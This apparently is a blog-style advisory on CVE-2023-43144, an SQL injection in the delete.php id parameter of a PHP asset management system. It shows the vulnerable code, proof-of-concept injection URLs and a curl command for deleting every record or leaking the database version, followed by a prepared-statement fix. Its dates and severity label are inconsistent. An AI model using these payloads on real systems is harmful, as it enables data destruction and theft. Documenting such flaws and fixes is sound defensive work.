CVE-2023-43144 - Critical SQL Injection in Projectworlds Assets-management-system-in-php 1. (Step-by-Step Exploit Guide)

Published: June 2024
Severity: HIGH

🚨 What’s the Issue?

A newly discovered vulnerability, CVE-2023-43144, affects the popular open-source asset management system hosted by Projectworlds: assets-management-system-in-php 1.. The flaw is a classic SQL Injection via the id parameter in the file delete.php. Attackers can manipulate the application’s database, allowing them to read, modify, or destroy data and even achieve code execution.

💡 Why Should I Care?

SQL Injection is one of the most dangerous web vulnerabilities. With CVE-2023-43144, an unauthenticated attacker could:

Gain full control over the system in some settings

If you’re running the unpatched version of this asset management system, you are at risk!

Let’s look at the vulnerable part in delete.php

<?php
include('db.php');
$id = $_GET['id'];
$sql = "DELETE FROM assets WHERE id = $id";
$result = mysqli_query($con, $sql);
if($result){
    header("Location: index.php?msg=Asset Deleted");
} else {
    echo "Failed to delete!";
}
?>

🔨 How to Exploit (Proof of Concept)

Suppose the site runs at http://localhost/assets-management/. The normal link to delete an asset might be:

http://localhost/assets-management/delete.php?id=10

To exploit, an attacker can send

http://localhost/assets-management/delete.php?id=10 OR 1=1

SQL Query Becomes

DELETE FROM assets WHERE id = 10 OR 1=1

This will delete ALL records in the table, not just id=10.

More dangerous, an attacker could use a UNION SELECT for information disclosure

http://localhost/assets-management/delete.php?id= UNION SELECT 1,2,version()--

(Actual effectiveness depends on database error reporting and schema.)

Open browser or use command-line tool (like curl):

`

curl "http://localhost/assets-management/delete.php?id= OR 1=1"

Sanitize all user input and always use prepared statements

$id = $_GET['id'];
$stmt = $con->prepare("DELETE FROM assets WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Or at a minimum

$id = intval($_GET['id']); // Ensures only an integer is used

But prepared statements are always preferable!

🔎 References

- CVE-2023-43144 at NVD
- Projectworlds Official Project Page
- Simple PHP SQLi Guide

📝 Conclusion

If you are using Projectworlds Assets-management-system-in-php 1., upgrade or patch your application immediately. Never trust user input, and always use prepared statements when dealing with databases. An unpatched installation puts your data and users at serious risk.

Stay safe! 🚨

*This is an exclusive analysis. If you found it useful, please share and consider contributing patches to open-source projects you use!*

Timeline

Published on: 09/22/2023 15:15:12 UTC
Last modified on: 09/25/2023 16:45:30 UTC